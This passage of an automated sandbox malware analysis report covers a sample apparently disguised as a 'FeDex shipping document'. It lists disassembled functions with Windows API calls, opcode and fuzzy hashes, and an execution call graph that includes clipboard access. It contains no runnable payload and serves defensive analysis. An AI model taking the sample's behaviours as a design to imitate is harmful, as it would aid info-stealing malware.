                                                                                        • Opcode Fuzzy Hash: 37276ba6ab409296be4cff5dfb137a83c180f6059b6eabe4c621d90a6a2d22c4
                                                                                        • Instruction Fuzzy Hash: AE41F4B1D0061DCFDB24CFA9C984BCDBBB5BF59314F20806AD418AB251DB756946CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01843DE8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 114 1843de8-1845431 CreateActCtxA 117 1845433-1845439 114->117 118 184543a-1845494 114->118 117->118 125 1845496-1845499 118->125 126 18454a3-18454a7 118->126 125->126 127 18454b8 126->127 128 18454a9-18454b5 126->128 130 18454b9 127->130 128->127 130->130
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 01845421
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 5c659df5374430fa8e133f1c9c8c031496a44828ad57773dc5b47c53ab4e001d
                                                                                        • Instruction ID: 4ed7b6bb58d1caf8f0cfdd2a44ed3d2c7242d190913db06ff9c61f520d7a8ace
                                                                                        • Opcode Fuzzy Hash: 5c659df5374430fa8e133f1c9c8c031496a44828ad57773dc5b47c53ab4e001d
                                                                                        • Instruction Fuzzy Hash: B941C1B1D0061DCFDB24CFAAC9847CEBBB5BF58315F60805AD408AB251DBB55945CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0184C938 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 131 184c938-184c93e 132 184c945-184c9d4 DuplicateHandle 131->132 133 184c940-184c944 131->133 134 184c9d6-184c9dc 132->134 135 184c9dd-184c9fa 132->135 133->132 134->135
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0184C9C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 92750d92a17f8139e8f49314c20273094ae1b8d4d79d248b92187348b13f05c6
                                                                                        • Instruction ID: 02b8a4758ee3ab7c0783233f889fcab806cc056bed1cdc135fe200a1fda09f21
                                                                                        • Opcode Fuzzy Hash: 92750d92a17f8139e8f49314c20273094ae1b8d4d79d248b92187348b13f05c6
                                                                                        • Instruction Fuzzy Hash: 4B21E7B5D01218AFDB10CF9AD584ADEBFF8FB48320F14841AE914B3610D374A954CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0184C940 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 138 184c940-184c9d4 DuplicateHandle 140 184c9d6-184c9dc 138->140 141 184c9dd-184c9fa 138->141 140->141
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0184C9C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: c5b4cdecc7c599f89e03cd0d2eef2bf7a39cd0366eaab013763cd44d1360d2ee
                                                                                        • Instruction ID: bf1687bc3fa46f8bc90509ba2cfc408d32603878e179dda22b39b0a659e394d4
                                                                                        • Opcode Fuzzy Hash: c5b4cdecc7c599f89e03cd0d2eef2bf7a39cd0366eaab013763cd44d1360d2ee
                                                                                        • Instruction Fuzzy Hash: 1821C4B5D01219AFDB10CF9AD984ADEBFF8EB58320F14841AE914B3310D378A954CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0184A488 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 144 184a488-184a48e 145 184a495-184a4d0 144->145 146 184a490-184a494 144->146 147 184a4d2-184a4d5 145->147 148 184a4d8-184a507 LoadLibraryExW 145->148 146->145 147->148 149 184a510-184a52d 148->149 150 184a509-184a50f 148->150 150->149
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0184A2E9,00000800,00000000,00000000), ref: 0184A4FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 239cb9624a1b211837de6d637a249c12dcdf8afb159808914f2dca129d241a61
                                                                                        • Instruction ID: efc304620b3b89e57b0245ea117b64836ff5ec7ead3174a3173e5b201326a4c4
                                                                                        • Opcode Fuzzy Hash: 239cb9624a1b211837de6d637a249c12dcdf8afb159808914f2dca129d241a61
                                                                                        • Instruction Fuzzy Hash: 1E2147B6D002088FDB14CFAAC484ADEFBF8EB48320F14841AD519BB200C779A645CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 018493D8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 153 18493d8-184a4d0 156 184a4d2-184a4d5 153->156 157 184a4d8-184a507 LoadLibraryExW 153->157 156->157 158 184a510-184a52d 157->158 159 184a509-184a50f 157->159 159->158
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0184A2E9,00000800,00000000,00000000), ref: 0184A4FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: f9d1426ac4a9352c1241475e66ffbe19d19d19ef3e9ff08971eba718db240ecc
                                                                                        • Instruction ID: 18ded4f1c320fe32860821338e135bdc3436ece11b992ba11b5299cc981bdc04
                                                                                        • Opcode Fuzzy Hash: f9d1426ac4a9352c1241475e66ffbe19d19d19ef3e9ff08971eba718db240ecc
                                                                                        • Instruction Fuzzy Hash: ED1147B2D002088FDB14CF9AC444ADEFBF4EB48310F10841AE519B7200C774AA45CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0184A208 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 162 184a208-184a248 163 184a250-184a27b GetModuleHandleW 162->163 164 184a24a-184a24d 162->164 165 184a284-184a298 163->165 166 184a27d-184a283 163->166 164->163 166->165
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0184A26E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: ae9cc5627b2c731597fb6347ec89b23c8e9894d2b93ef70cd920bc0deb953d23
                                                                                        • Instruction ID: a3ba068620d3de4305f4cf48b64bf27826ecb88171cd3bce6df319db07d01996
                                                                                        • Opcode Fuzzy Hash: ae9cc5627b2c731597fb6347ec89b23c8e9894d2b93ef70cd920bc0deb953d23
                                                                                        • Instruction Fuzzy Hash: 291113B5D006198FDB14CF9AD444ADEFBF4EF88324F14851AD519B7600C379A645CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015DD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265445635.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15dd000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5515bcd51bdafcf616bb9ebdbb71b2e51eeac3eecd1d94d7060ca653cd9861f3
                                                                                        • Instruction ID: ce07902c82df3fc24b9012506e7b243f5e86bd89c46f3a3a3ba5b6176b4a801f
                                                                                        • Opcode Fuzzy Hash: 5515bcd51bdafcf616bb9ebdbb71b2e51eeac3eecd1d94d7060ca653cd9861f3
                                                                                        • Instruction Fuzzy Hash: E321F471500240DFDB21DF58D9C0B5ABFB5FB84324F24C569D8090F286C37AE856CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015ED01C Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265609795.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15ed000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2cbb20ba1c0b358a4b58269b9fa7326ce97b28cf202c38968520ced85650ba92
                                                                                        • Instruction ID: 1e37944103bca61116bb5df581dade5515615b1cfbb577b8fdaf45289e85ff67
                                                                                        • Opcode Fuzzy Hash: 2cbb20ba1c0b358a4b58269b9fa7326ce97b28cf202c38968520ced85650ba92
                                                                                        • Instruction Fuzzy Hash: 30212271A04240DFDB19CF58D8C8B26BFF5FB84354F28C969D80A0F246D33AD806CAA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015ED1D4 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265609795.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15ed000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5e9c6aeffe843385ef733b32ffbde6b7dbcaae7ba8cd2781544ef2cb51fe6a7a
                                                                                        • Instruction ID: 2df75b02e2edd4f99b60568364bcbd87cc03b68168ef36aa2c3c5aa629593062
                                                                                        • Opcode Fuzzy Hash: 5e9c6aeffe843385ef733b32ffbde6b7dbcaae7ba8cd2781544ef2cb51fe6a7a
                                                                                        • Instruction Fuzzy Hash: BA21F575904240DFDB09DF58D9C4B1ABBF5FB84324F24CAADD8494F242C33AD846CA61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015ED006 Relevance: .1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265609795.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15ed000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 26235df71612fae75ed6659bb55cdc83fd43c266b1b705fd9cf0a3ddf06a5a8d
                                                                                        • Instruction ID: a7f8f13a8abb66eb67a83e9e628e88fa798f334c804f5636f75cd165399404e6
                                                                                        • Opcode Fuzzy Hash: 26235df71612fae75ed6659bb55cdc83fd43c266b1b705fd9cf0a3ddf06a5a8d
                                                                                        • Instruction Fuzzy Hash: 0D2192755093808FDB17CF24D994B15BFB1FB46214F28C5EAD8498F657C33A980ACB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015DD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265445635.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15dd000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 61320e68dcada6a4288cfb14426133e2d8667ae2203a6cd0fd4dceb7ffcfce69
                                                                                        • Instruction ID: 8e3fdf3ba10df7dcf9e1e60d0fc2eb4b0bc1fa9077c354e229a3fb1642dea574
                                                                                        • Opcode Fuzzy Hash: 61320e68dcada6a4288cfb14426133e2d8667ae2203a6cd0fd4dceb7ffcfce69
                                                                                        • Instruction Fuzzy Hash: C711DF72404280DFDB22CF48D9C0B5ABF71FB84324F24C2A9D8090F656C33AE456CBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015ED1CF Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265609795.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15ed000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d8b01aa10aa151543403a38a450c85d57a6413dd1d1fd3e55dbf65ef40ab6d48
                                                                                        • Instruction ID: 9558cb781469c69e5b70708aef94fc7feac5980aad76ae2a232561fc970caf46
                                                                                        • Opcode Fuzzy Hash: d8b01aa10aa151543403a38a450c85d57a6413dd1d1fd3e55dbf65ef40ab6d48
                                                                                        • Instruction Fuzzy Hash: 6011BB76904280DFDB16CF54CAC4B19BBB1FB84224F28C6ADD8494F656C33AD44ACB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015DD745 Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265445635.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15dd000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a299c17c5d4473c538842bac3af7a165c056125aea5c3c564245685b100c745c
                                                                                        • Instruction ID: 192b744c10362048c8d01d6747910d8ac1ce677f0156aaf8c45530d2ecdcae9e
                                                                                        • Opcode Fuzzy Hash: a299c17c5d4473c538842bac3af7a165c056125aea5c3c564245685b100c745c
                                                                                        • Instruction Fuzzy Hash: 6301D4615042C0AAE7308A5DCC84B6ABFECEF51224F09859AED091E286C2799840C7B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015DD744 Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265445635.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15dd000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6e5cc6ab55b7d4b6a754517b9621f7867c3bd4aae6a4ec478ea7485ee8414e2d
                                                                                        • Instruction ID: 63d486531ca7061ef96f5f8b52c4dcf28c0a35d53eb815feda38203a6475e665
                                                                                        • Opcode Fuzzy Hash: 6e5cc6ab55b7d4b6a754517b9621f7867c3bd4aae6a4ec478ea7485ee8414e2d
                                                                                        • Instruction Fuzzy Hash: 27F06272404284AEE7218E1ADC84B66FFACEB51634F18C55AED485F286C37D9844CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 0184F1F8 Relevance: .3, Instructions: 315COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6e790f7868c70ecc691d7668c73d82ad3d91e74adc94a7cbaae6229bacf76772
                                                                                        • Instruction ID: fb83ac9be3a60cccc06a86ad00555dbfdc9ac6c6f70241ff70f7f988e6cefe8b
                                                                                        • Opcode Fuzzy Hash: 6e790f7868c70ecc691d7668c73d82ad3d91e74adc94a7cbaae6229bacf76772
                                                                                        • Instruction Fuzzy Hash: EE12A6F14117468BE330CF65F99868D3BA1B7453AAF906308D2A16BAF9D7B4134ACF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0184C844 Relevance: .3, Instructions: 265COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b10ec072e1479a6cd8e0297820e6cb7bc44dfc5dc9bf623ef20c36dd99630507
                                                                                        • Instruction ID: e6573094d0da48ff1c38697bae97a32bd1009021dfdff53856a5ee80781b38b6
                                                                                        • Opcode Fuzzy Hash: b10ec072e1479a6cd8e0297820e6cb7bc44dfc5dc9bf623ef20c36dd99630507
                                                                                        • Instruction Fuzzy Hash: 54A15D36E0061A8FDF15DFA9C8845DDBBB2FF84310B15856AE905EB261EF35AA05CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0184F1E8 Relevance: .2, Instructions: 237COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 91f76effb691257f03ddc6e4499d630b30b9e973574154b2b955567440213d3f
                                                                                        • Instruction ID: 393fde8f5dc6d97b3532dcbb1a78e1be6c8e9605baa474625526bfae44a11e07
                                                                                        • Opcode Fuzzy Hash: 91f76effb691257f03ddc6e4499d630b30b9e973574154b2b955567440213d3f
                                                                                        • Instruction Fuzzy Hash: C7C15AB18117468BD730CF64E89828D3BB1FB853A9F506309D2616BAF9D7B4124ACF84
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:10.6%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0.9%
                                                                                        Total number of Nodes:349
                                                                                        Total number of Limit Nodes:35
                                                                                        execution_graph 41066 6c963e8 41067 6c963ed 41066->41067 41072 6c968e8 41067->41072 41082 6c96890 41067->41082 41086 6c96880 41067->41086 41068 6c964fd 41073 6c968ac 41072->41073 41077 6c968f2 41072->41077 41090 6c96084 41073->41090 41076 6c969b1 41077->41076 41093 6c9feb0 41077->41093 41097 6c96a05 41077->41097 41104 6c96e00 41077->41104 41111 6c9fea0 41077->41111 41083 6c96895 41082->41083 41084 6c968be 41083->41084 41085 6c96084 DuplicateHandle 41083->41085 41084->41068 41085->41084 41087 6c96890 41086->41087 41088 6c968be 41087->41088 41089 6c96084 DuplicateHandle 41087->41089 41088->41068 41089->41088 41091 6c96f20 DuplicateHandle 41090->41091 41092 6c968be 41091->41092 41092->41068 41094 6c9feb5 41093->41094 41115 6c96ff0 41094->41115 41099 6c96e00 41097->41099 41098 6c96ee3 41099->41098 41103 6c96ff0 2 API calls 41099->41103 41156 6c97329 41099->41156 41163 6c96fe1 41099->41163 41170 6c97108 41099->41170 41103->41099 41105 6c96e05 41104->41105 41106 6c96ee3 41105->41106 41107 6c97329 2 API calls 41105->41107 41108 6c97108 2 API calls 41105->41108 41109 6c96fe1 2 API calls 41105->41109 41110 6c96ff0 2 API calls 41105->41110 41107->41105 41108->41105 41109->41105 41110->41105 41112 6c9feb0 41111->41112 41113 6c96ff0 2 API calls 41112->41113 41114 6c9ffa5 41113->41114 41114->41077 41117 6c97011 41115->41117 41116 6c97358 41116->41077 41117->41116 41122 6c98518 41117->41122 41130 6c98528 41117->41130 41138 6c9c54f 41117->41138 41142 6c9c560 41117->41142 41123 6c98528 41122->41123 41124 6c98693 41123->41124 41125 6c9859c 41123->41125 41127 6c98518 KiUserCallbackDispatcher 41123->41127 41128 6c98528 KiUserCallbackDispatcher 41123->41128 41124->41117 41126 6c985d5 41125->41126 41147 6c98978 41125->41147 41126->41117 41127->41125 41128->41125 41131 6c98545 41130->41131 41132 6c98693 41131->41132 41133 6c9859c 41131->41133 41136 6c98518 KiUserCallbackDispatcher 41131->41136 41137 6c98528 KiUserCallbackDispatcher 41131->41137 41132->41117 41134 6c985d5 41133->41134 41135 6c98978 KiUserCallbackDispatcher 41133->41135 41134->41117 41135->41132 41136->41133 41137->41133 41141 6c9c560 41138->41141 41140 6c9c56f 41140->41117 41141->41140 41152 6c9bd10 41141->41152 41143 6c9c56f 41142->41143 41146 6c9c5cf 41142->41146 41143->41117 41144 6c9bd10 OleGetClipboard 41144->41146 41145 6c9c728 41145->41117 41146->41144 41146->41145 41151 6c9897b 41147->41151 41148 6c9b8e9 KiUserCallbackDispatcher 41150 6c9b916 41148->41150 41149 6c99b24 41149->41124 41150->41124 41151->41148 41151->41149 41153 6c9ca08 OleGetClipboard 41152->41153 41155 6c9caa2 41153->41155 41157 6c97011 41156->41157 41158 6c97358 41157->41158 41159 6c9c54f OleGetClipboard 41157->41159 41160 6c9c560 OleGetClipboard 41157->41160 41161 6c98518 KiUserCallbackDispatcher 41157->41161 41162 6c98528 KiUserCallbackDispatcher 41157->41162 41158->41099 41159->41157 41160->41157 41161->41157 41162->41157 41165 6c97011 41163->41165 41164 6c97358 41164->41099 41165->41164 41166 6c98518 KiUserCallbackDispatcher 41165->41166 41167 6c98528 KiUserCallbackDispatcher 41165->41167 41168 6c9c54f OleGetClipboard 41165->41168 41169 6c9c560 OleGetClipboard 41165->41169 41166->41165 41167->41165 41168->41165 41169->41165 41172 6c97011 41170->41172 41171 6c97358 41171->41099 41172->41171 41173 6c9c54f OleGetClipboard 41172->41173 41174 6c9c560 OleGetClipboard 41172->41174 41175 6c98518 KiUserCallbackDispatcher 41172->41175 41176 6c98528 KiUserCallbackDispatcher 41172->41176 41173->41172 41174->41172 41175->41172 41176->41172 41177 6e3e240 41178 6e3e286 GlobalMemoryStatusEx 41177->41178 41179 6e3e2b6 41178->41179 41180 6c90040 41181 6c90052 41180->41181 41183 6c90107 41181->41183 41188 6c90288 41181->41188 41193 6c90278 41181->41193 41182 6c900cd 41199 6c98948 41182->41199 41203 6c98938 41182->41203 41189 6c9029e 41188->41189 41207 6c908b8 41189->41207 41212 6c908e0 41189->41212 41194 6c9027b 41193->41194 41196 6c902dd 41193->41196 41194->41196 41197 6c908b8 CreateWindowExW 41194->41197 41198 6c908e0 CreateWindowExW 41194->41198 41195 6c902d2 41195->41182 41196->41182 41197->41195 41198->41195 41200 6c98950 41199->41200 41202 6c98973 41200->41202 41229 6c9626c 41200->41229 41202->41183 41204 6c9893d 41203->41204 41205 6c9626c KiUserCallbackDispatcher 41204->41205 41206 6c98973 41204->41206 41205->41204 41206->41183 41208 6c908bd 41207->41208 41209 6c909b1 41208->41209 41217 6c934ef 41208->41217 41222 6c93520 41208->41222 41213 6c9090a 41212->41213 41214 6c909b1 41213->41214 41215 6c934ef CreateWindowExW 41213->41215 41216 6c93520 CreateWindowExW 41213->41216 41215->41214 41216->41214 41218 6c93500 41217->41218 41219 6c93505 41217->41219 41218->41209 41225 6c91c50 41219->41225 41223 6c91c50 CreateWindowExW 41222->41223 41224 6c93555 41223->41224 41224->41209 41226 6c93570 CreateWindowExW 41225->41226 41228 6c93694 41226->41228 41230 6c9b8a8 KiUserCallbackDispatcher 41229->41230 41232 6c9b916 41230->41232 41232->41200 41233 6c9c160 41234 6c9c16b 41233->41234 41236 6c9c17b 41234->41236 41237 6c9bbfc 41234->41237 41238 6c9c1b0 OleInitialize 41237->41238 41240 6c9c214 41238->41240 41240->41236 41358 6c93810 41359 6c93836 41358->41359 41362 6c91c7c 41359->41362 41363 6c91c87 41362->41363 41364 6c980e9 41363->41364 41366 6c980d9 41363->41366 41367 6c980e7 41364->41367 41401 6c961e4 41364->41401 41373 6aabbd8 41366->41373 41378 6aabca4 41366->41378 41384 6c98210 41366->41384 41390 6c98200 41366->41390 41396 6aabbc9 41366->41396 41374 6aabbec 41373->41374 41408 6aabc7f 41374->41408 41412 6aabc90 41374->41412 41375 6aabc78 41375->41367 41379 6aabc62 41378->41379 41380 6aabcb2 41378->41380 41382 6aabc7f 3 API calls 41379->41382 41383 6aabc90 3 API calls 41379->41383 41381 6aabc78 41381->41367 41382->41381 41383->41381 41386 6c9821e 41384->41386 41385 6c961e4 3 API calls 41385->41386 41386->41385 41387 6c982fe 41386->41387 41426 6c9b938 41386->41426 41430 6c9b948 41386->41430 41387->41367 41392 6c98210 41390->41392 41391 6c961e4 3 API calls 41391->41392 41392->41391 41393 6c982fe 41392->41393 41394 6c9b948 OleGetClipboard 41392->41394 41395 6c9b938 OleGetClipboard 41392->41395 41393->41367 41394->41392 41395->41392 41398 6aabbd8 41396->41398 41397 6aabc78 41397->41367 41399 6aabc7f 3 API calls 41398->41399 41400 6aabc90 3 API calls 41398->41400 41399->41397 41400->41397 41402 6c961ef 41401->41402 41403 6c9835a 41402->41403 41404 6c98404 41402->41404 41406 6c983b2 CallWindowProcW 41403->41406 41407 6c98361 41403->41407 41405 6c91c7c 2 API calls 41404->41405 41405->41407 41406->41407 41407->41367 41409 6aabc90 41408->41409 41410 6aabca1 41409->41410 41415 6aad121 41409->41415 41410->41375 41413 6aabca1 41412->41413 41414 6aad121 3 API calls 41412->41414 41413->41375 41414->41413 41418 6c961e4 3 API calls 41415->41418 41419 6c98309 41415->41419 41416 6aad13a 41416->41410 41418->41416 41420 6c98318 41419->41420 41421 6c9835a 41420->41421 41422 6c98404 41420->41422 41424 6c983b2 CallWindowProcW 41421->41424 41425 6c98361 41421->41425 41423 6c91c7c 2 API calls 41422->41423 41423->41425 41424->41425 41425->41416 41428 6c9b948 41426->41428 41427 6c9baa5 41427->41386 41428->41427 41434 6c9bed7 41428->41434 41431 6c9b967 41430->41431 41432 6c9baa5 41431->41432 41433 6c9bed7 OleGetClipboard 41431->41433 41432->41386 41433->41431 41436 6c9bee5 41434->41436 41435 6c9bf5c 41435->41428 41436->41435 41440 6c9bf88 41436->41440 41451 6c9bf78 41436->41451 41437 6c9bf71 41437->41428 41441 6c9bf9a 41440->41441 41442 6c9bfb5 41441->41442 41444 6c9bff9 41441->41444 41447 6c9bf88 OleGetClipboard 41442->41447 41448 6c9bf78 OleGetClipboard 41442->41448 41443 6c9bfbb 41443->41437 41446 6c9c079 41444->41446 41449 6c9c54f OleGetClipboard 41444->41449 41450 6c9c560 